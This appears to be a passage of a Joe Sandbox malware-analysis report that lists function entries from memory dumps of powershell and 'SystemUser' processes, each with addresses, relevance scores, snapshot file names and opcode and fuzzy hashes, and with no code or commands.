                                                            Non-executed Functions

                                                            Function 00007FF848E68BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336225874.00007FF848E65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E65000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848e65000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N_^4$N_^7$N_^F$N_^J
                                                            • API String ID: 0-3508309026
                                                            • Opcode ID: dabbe24802d554556fd15f6229eae3468619220f0459efd10296f077a3207134
                                                            • Instruction ID: f18af481f557b0c005d2f7b16879bad207cd7bf6b81cc1df4859641e2e7b9136
                                                            • Opcode Fuzzy Hash: dabbe24802d554556fd15f6229eae3468619220f0459efd10296f077a3207134
                                                            • Instruction Fuzzy Hash: 29213BF76494257ED3097BBCFC145E93B40EF942B4B4941B2D298CF143EA1470868AD6

                                                            Executed Functions

                                                            Function 00007FF848F46605 Relevance: .4, Instructions: 435COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2531799923.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06cfc6a8aea4af51eb0ec3eda91d6b7fb664746b4d30d48c7c8acbff4a17d355
                                                            • Instruction ID: 8eba285a6fb11f02da3e206646b282e49058fb2a69e51c5ab4e7a1c2bb7aa288
                                                            • Opcode Fuzzy Hash: 06cfc6a8aea4af51eb0ec3eda91d6b7fb664746b4d30d48c7c8acbff4a17d355
                                                            • Instruction Fuzzy Hash: 50D14571D1EA8A5FF79AAB2858145B57BA0EF26B90F1801FBD00DDB0C3EE1CA805C755
                                                            Function 00007FF848F44073 Relevance: .2, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2531799923.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87ba7864786af410227e4e7785432716f9021a5c2cbce8f7555b98533d19c983
                                                            • Instruction ID: f1f4d4c2b9bfe09eee7f1a038c1e22fe244e71802fcf789d1e608cbc2b8479fd
                                                            • Opcode Fuzzy Hash: 87ba7864786af410227e4e7785432716f9021a5c2cbce8f7555b98533d19c983
                                                            • Instruction Fuzzy Hash: 5551F532A0EA8A4FE79AAB1C541167477E1FFB5A54F1801BBC00EE71D7DF18E8158349
                                                            Function 00007FF848F44370 Relevance: .1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2531799923.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ece30c8a498de78e4d6bcf280cc85a7db3219c5560921c000ad2fbc4c1046d8e
                                                            • Instruction ID: 6f33b2ee5fbead0477c35621ae4d048a2c104f1087a5aff0e756925a9f148d89
                                                            • Opcode Fuzzy Hash: ece30c8a498de78e4d6bcf280cc85a7db3219c5560921c000ad2fbc4c1046d8e
                                                            • Instruction Fuzzy Hash: D2412832E0EA494FE7A9EB2C64116B477E1EF65B64F0800BBD44DE71D7EB18AC108395
                                                            Function 00007FF848E79780 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2530973049.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848e75000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4222f3267a335b63287c94d718c0c44f28d56e2a1356146eada77ff311373052
                                                            • Instruction ID: 380ed4367c4f2e6af1fef36bef4de6e7896ab481b64154c9ed1528af63351f46
                                                            • Opcode Fuzzy Hash: 4222f3267a335b63287c94d718c0c44f28d56e2a1356146eada77ff311373052
                                                            • Instruction Fuzzy Hash: 0731F53191CB888FDB08DB1C98066A97BF0FB99311F00426FE44983652CA75A856CBC6
                                                            Function 00007FF848D5EE20 Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2529823614.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848d5d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af004c56f6f16d168bd140cdecaa7c6ab2acdad6c7f4a2128a9224f10de9e3f
                                                            • Instruction ID: 7364931ae11524c8b14a0e3585ba908e163edafaff4011e80ffaf9bb805c0e96
                                                            • Opcode Fuzzy Hash: 9af004c56f6f16d168bd140cdecaa7c6ab2acdad6c7f4a2128a9224f10de9e3f
                                                            • Instruction Fuzzy Hash: 9041087180EBC44FD756AB399841A527FF0EF57360B1505EFD088CB1A3D625A84AC7A2
                                                            Function 00007FF848E7A668 Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2530973049.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848e75000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9578cdcb60386b6b8b48cfbcbc129df8bd5a28d955f7ef1f8511e1238fee6faf
                                                            • Instruction ID: 2781ba0d7863e943755bc06146bbb73b6484bf397f86c7e2ee29d01b107e6a0d
                                                            • Opcode Fuzzy Hash: 9578cdcb60386b6b8b48cfbcbc129df8bd5a28d955f7ef1f8511e1238fee6faf
                                                            • Instruction Fuzzy Hash: 7621C23190CA4C8FDB58DF9CD84A7E97BE0EBA5321F00426FD44DC3152DA70A85ACB91
                                                            Function 00007FF848F440BF Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2531799923.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08d06c3f997eeb0644710b6ea320ad305fa5d9afec8d61ab87785d1c40b7a23c
                                                            • Instruction ID: 5ebd2ef7cd7beadd448b01981b49a0df0995ee35fecbe08c9df08c6d336a825a
                                                            • Opcode Fuzzy Hash: 08d06c3f997eeb0644710b6ea320ad305fa5d9afec8d61ab87785d1c40b7a23c
                                                            • Instruction Fuzzy Hash: 7D21C132E0E98B4FE7AAAB1C545017466D1FFB4A98F5900BAD01EE71E2CF18DC148349
                                                            Function 00007FF848F443BC Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2531799923.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea1635148e83190d78ad7735d500c076db0fc34d267e39e12b73a1411a5eed91
                                                            • Instruction ID: dfb74362a25060e8bce7df7899e10ee9e9af46ae6b733b397e81217e89552063
                                                            • Opcode Fuzzy Hash: ea1635148e83190d78ad7735d500c076db0fc34d267e39e12b73a1411a5eed91
                                                            • Instruction Fuzzy Hash: 1711E032E0E9864FEBA4EB2894505B477E0FF74F64F5900B6D45DE31E6DB18AC108399
                                                            Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2530973049.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848e70000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                                            Function 00007FF848E7A0FB Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2530973049.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848e75000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcf004ff82658e5a65a147ff1ee24934036853ee05ba318882092c691fb46a54
                                                            • Instruction ID: 9c70a8930c7a1094de29a95af0faadf46e0f408d2c7d24843005eb519ae28088
                                                            • Opcode Fuzzy Hash: dcf004ff82658e5a65a147ff1ee24934036853ee05ba318882092c691fb46a54
                                                            • Instruction Fuzzy Hash: A9F0967A95DA8C4FDB85EF2C98690E57F90FF66211B0402ABD548C7161DB219948CB81

                                                            Non-executed Functions

                                                            Function 00007FF848E78BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.2530973049.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7ff848e75000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                            • API String ID: 0-962139525
                                                            • Opcode ID: 055f79e6cc15beec09a2948ebf8f001513de8e490ff01305edabf5b6fa2e7d87
                                                            • Instruction ID: 63ad6347c9b35d5a557e4d70a1f235b63e22809effe47ae7a8015eb5b1719947
                                                            • Opcode Fuzzy Hash: 055f79e6cc15beec09a2948ebf8f001513de8e490ff01305edabf5b6fa2e7d87
                                                            • Instruction Fuzzy Hash: 6721D7F3684925AED209366DB8419EC7780EF543B978A53F3E028CF153EE1864878A95

                                                            Executed Functions

                                                            Function 00007FF848E71719 Relevance: .7, Instructions: 697COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d59789cfb69ed43b528c9c8e11cb511ffab3fc202ad572d818c25f2dfe4ce98
                                                            • Instruction ID: b73471a62dc78344576b64556cdcb6df5062d7b570fa9c4f74b80bf5250f8d0a
                                                            • Opcode Fuzzy Hash: 5d59789cfb69ed43b528c9c8e11cb511ffab3fc202ad572d818c25f2dfe4ce98
                                                            • Instruction Fuzzy Hash: 6D22C020A2DE5A9FE798FB3884592B9B7D2FF98780F440579D00EC32C6DF29A8018755
                                                            Function 00007FF848E720F1 Relevance: .2, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f1728d23d5c29d16a1c7c7f167011d6fd271eb83a3b56345d89b672c2c1678f
                                                            • Instruction ID: 70f8b50bf9ddb2511ba05b9f904fc53ca31a44b64e8cfe1dc009dbfc8f2002b4
                                                            • Opcode Fuzzy Hash: 2f1728d23d5c29d16a1c7c7f167011d6fd271eb83a3b56345d89b672c2c1678f
                                                            • Instruction Fuzzy Hash: F4512020A1E6C95FD786A7385864276BFE1EF97269F0800FBE08AC71D7DE180806C356
                                                            Function 00007FF848E70AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9N_^
                                                            • API String ID: 0-1737749909
                                                            • Opcode ID: 94679fb4c9526bab7968ccf60f129a0f41030c50875d1198d5f1a7c7e27b9eae
                                                            • Instruction ID: 90d2128557b3bfbb8179753fc5d1a68f0812dc4db1600f1d83b56288d4f2032e
                                                            • Opcode Fuzzy Hash: 94679fb4c9526bab7968ccf60f129a0f41030c50875d1198d5f1a7c7e27b9eae
                                                            • Instruction Fuzzy Hash: 78611665A4D92AAFD709B7BCE4412FC7BA1FF843A5F184176C14DC7183CF2864468BA8
                                                            Function 00007FF848E70E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4N_^
                                                            • API String ID: 0-2516135240
                                                            • Opcode ID: 4374fe1994e554f066cf4d3265cb86ea56c9220b6f6103f7c9a07cb0b5398d93
                                                            • Instruction ID: a4f5ff97844ecf0220bd2b2c3e10afb5957335acc3ba60b7af60c286e2b73ddf
                                                            • Opcode Fuzzy Hash: 4374fe1994e554f066cf4d3265cb86ea56c9220b6f6103f7c9a07cb0b5398d93
                                                            • Instruction Fuzzy Hash: 35513721A1EAC65FE39AB77C58252B57FE1EF86660B0940FBD08CC7193DD1C5C428752
                                                            Function 00007FF848E71295 Relevance: .9, Instructions: 864COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a97c3c90d201464e5069ce8aac75485ee70e4c18c36687ba395c8971e408c6b4
                                                            • Instruction ID: 3f45888a30a151414f2a997e0f85c701a674ab374efe07a18fc5791eb56bfb77
                                                            • Opcode Fuzzy Hash: a97c3c90d201464e5069ce8aac75485ee70e4c18c36687ba395c8971e408c6b4
                                                            • Instruction Fuzzy Hash: D421E673D0DB995FE305B77CA8650E57BA1FF422A1F0800B7C088CA193EE2968058794
                                                            Function 00007FF848E70985 Relevance: .3, Instructions: 346COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8667c6964be18e25a37c0734e5379b74fbdbba7225a28c7d5baa9a1995619a6
                                                            • Instruction ID: 0d3743334c82c3fa3b745734e831e859d688fba36bdfc9086acc01fac69250ae
                                                            • Opcode Fuzzy Hash: d8667c6964be18e25a37c0734e5379b74fbdbba7225a28c7d5baa9a1995619a6
                                                            • Instruction Fuzzy Hash: A0A12966749926AFD705BBBCF8412E97BA0FF853B5F084177C149CB183CB2464468BE4
                                                            Function 00007FF848E709D3 Relevance: .3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0fef3d9c59d6589c3e342f2216c8de5737bd5be26d9eea33ecfad34cf4591fd8
                                                            • Instruction ID: bbee1d610a2ab14cb70a0e20ef4b762878603649d9960590942eda128e660ae0
                                                            • Opcode Fuzzy Hash: 0fef3d9c59d6589c3e342f2216c8de5737bd5be26d9eea33ecfad34cf4591fd8
                                                            • Instruction Fuzzy Hash: 3E913966B49926AFD708BBBCF8012E97B90FF843B5F484577C249CB183CB24644687E4
                                                            Function 00007FF848E70A08 Relevance: .3, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 834402fa4a1731f0dcad1703f494f32b2fd5ea08c60a8db96169f090b78da4c2
                                                            • Instruction ID: 9ae54bda7e1c1cc2b57894c69bf60c03cc984a51828beb3e0da2cc6cab4425c7
                                                            • Opcode Fuzzy Hash: 834402fa4a1731f0dcad1703f494f32b2fd5ea08c60a8db96169f090b78da4c2
                                                            • Instruction Fuzzy Hash: A0814966B48926AFD708BBBCF8012E97BA1FF853B5F184577C149C7183CB2464468BE4
                                                            Function 00007FF848E70A10 Relevance: .3, Instructions: 301COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5eb4d6ae362e7412867c286a2b9249acf9b80803b0281be7225017a9e0a14b50
                                                            • Instruction ID: 76f6f4f3fe0e39ea10f027809cb3b8eba30ec8e1ca26e1a9279b6b66e732d56b
                                                            • Opcode Fuzzy Hash: 5eb4d6ae362e7412867c286a2b9249acf9b80803b0281be7225017a9e0a14b50
                                                            • Instruction Fuzzy Hash: 7E813866B49926AFD708BBBCF8012E97BA1FF853B5F184177C149C7183CB2464468BE4
                                                            Function 00007FF848E70A48 Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36d423e2c40b1aeb31144f10311bc8a4f9233c0aebe84ed6298201dfee8dd51b
                                                            • Instruction ID: 1a8c37f3fcb697df02af7fb4de295bcd0c2104d54948e5819da328aab64fae9c
                                                            • Opcode Fuzzy Hash: 36d423e2c40b1aeb31144f10311bc8a4f9233c0aebe84ed6298201dfee8dd51b
                                                            • Instruction Fuzzy Hash: 60712866B4992AAFD708BBBCE4412E97BA1FF843B5F184176C149C7183CB246446CBE4
                                                            Function 00007FF848E70638 Relevance: .1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f96687edb3bff7ad8751c51812e950984409ce5c0996921554339aeab778d2f2
                                                            • Instruction ID: 79d3ae7c080274c5a309b3b844439174b1e96e74ceca9d39fa077d64a9bc4f6e
                                                            • Opcode Fuzzy Hash: f96687edb3bff7ad8751c51812e950984409ce5c0996921554339aeab778d2f2
                                                            • Instruction Fuzzy Hash: E031F020B1D9495FE798EB2C985A379B6C2FB98791F0401BEE00EC32D7DE689C428341
                                                            Function 00007FF848E70D21 Relevance: .1, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e6d4f7420ceca62c75fcfad7b35cda7f7e491db1ec76c9ce0d7c4a21e977e63
                                                            • Instruction ID: 05ea4c81ee3ff1965963dea6f6808f73655a5acdf8b40ed7e98baeccb526b0d1
                                                            • Opcode Fuzzy Hash: 0e6d4f7420ceca62c75fcfad7b35cda7f7e491db1ec76c9ce0d7c4a21e977e63
                                                            • Instruction Fuzzy Hash: 2931D261F1CE595FE788B7BC581A3B9B6D2FB98791F144176E00DC3282DE2868018751
                                                            Function 00007FF848E70BD3 Relevance: .1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26d95c7e4f19d79eab6f0ef0c86fa1e25b96b8c52d94c57d59a166ae7714846f
                                                            • Instruction ID: 9e1ea7ce2637dd58fedd8cb2b9ba692c26c6399665685b51d7e4fe2ffcc9f908
                                                            • Opcode Fuzzy Hash: 26d95c7e4f19d79eab6f0ef0c86fa1e25b96b8c52d94c57d59a166ae7714846f
                                                            • Instruction Fuzzy Hash: C841A230A1DA4E9FEB88FBB888652EDB7B2FF89341F540475D009D3286DF3868058761
                                                            Function 00007FF848E70858 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cc6a8ea1ac8bc3e21d6ff1862d69831b85caf21d52fabd3e6beaed8d1a4374b
                                                            • Instruction ID: 3a0762c6a3e0beb812aecab72a33afb144b3df7f46a60bd008291b35356601b7
                                                            • Opcode Fuzzy Hash: 5cc6a8ea1ac8bc3e21d6ff1862d69831b85caf21d52fabd3e6beaed8d1a4374b
                                                            • Instruction Fuzzy Hash: 2531B520A0AA4E9FD389FB2884A51E93FB2FF86248F9444F5D44DC778BDF2858018765
                                                            Function 00007FF848E70870 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 660858d27d902f2b460700aa2ce2c3ccbd1a4cf127657f63d78b1919223715b0
                                                            • Instruction ID: eb5b4b3fed870d3f92da91baaad41709b2398b56630e048beae550ad3af5b228
                                                            • Opcode Fuzzy Hash: 660858d27d902f2b460700aa2ce2c3ccbd1a4cf127657f63d78b1919223715b0
                                                            • Instruction Fuzzy Hash: 6A21B620A1AA4E9FD38CFB2880A54E97FB2FF86244F9444A5D409C378BDF3859108761
                                                            Function 00007FF848E722C1 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2596742430.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ff848e70000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f7aed287310978eaa09a92f7d51a6502f9a4b31cd95cf69673a5169b17651f1
                                                            • Instruction ID: b8e20dd31977b10e900c03b43c6a6dc2cab3f640618d4be8bbb7e53bc9ebf56a
                                                            • Opcode Fuzzy Hash: 7f7aed287310978eaa09a92f7d51a6502f9a4b31cd95cf69673a5169b17651f1
                                                            • Instruction Fuzzy Hash: 7701F42490DAC54FE795B73818654757FE1EF92280F0804BAE8C9C719BEE28A9858356

                                                            Executed Functions

                                                            Function 00007FF848E61719 Relevance: .7, Instructions: 697COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f535fe26cfbb7130ade20d3e4dcb4c3c400a8e7c533e6d3b248d940a9d861f0
                                                            • Instruction ID: 5945d4a0a33e9ed84c261e0068cfff4a4290516facfc4dfa686e9dafbcc5e9d6
                                                            • Opcode Fuzzy Hash: 7f535fe26cfbb7130ade20d3e4dcb4c3c400a8e7c533e6d3b248d940a9d861f0
                                                            • Instruction Fuzzy Hash: 1222C420E2DA595FE799FB3884592B977D2FF98780F840579D00ED32C6DE39B8018749
                                                            Function 00007FF848E620F1 Relevance: .2, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5262bca165a765db2e69383a4cbfd95419762e3cef830c46ee6f12a3cb438249
                                                            • Instruction ID: c11001636f7dcf618b1fb88560c2e9732819e67a9e6b9fdb528459dcced45b55
                                                            • Opcode Fuzzy Hash: 5262bca165a765db2e69383a4cbfd95419762e3cef830c46ee6f12a3cb438249
                                                            • Instruction Fuzzy Hash: 99512320A1E6C95FD786AB385864276BFE1EF97269F0800FBE08DC71D7DE181846C356
                                                            Function 00007FF848E60AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9O_^
                                                            • API String ID: 0-1716625314
                                                            • Opcode ID: ae5a284a2010dcc68d53f7ec6138762bf71df426ba2f4252f28ac0ad8c0c6c13
                                                            • Instruction ID: 390a932dacb34c058a2ee95642421e3db984ced8923963042dbaf56c0257a7a9
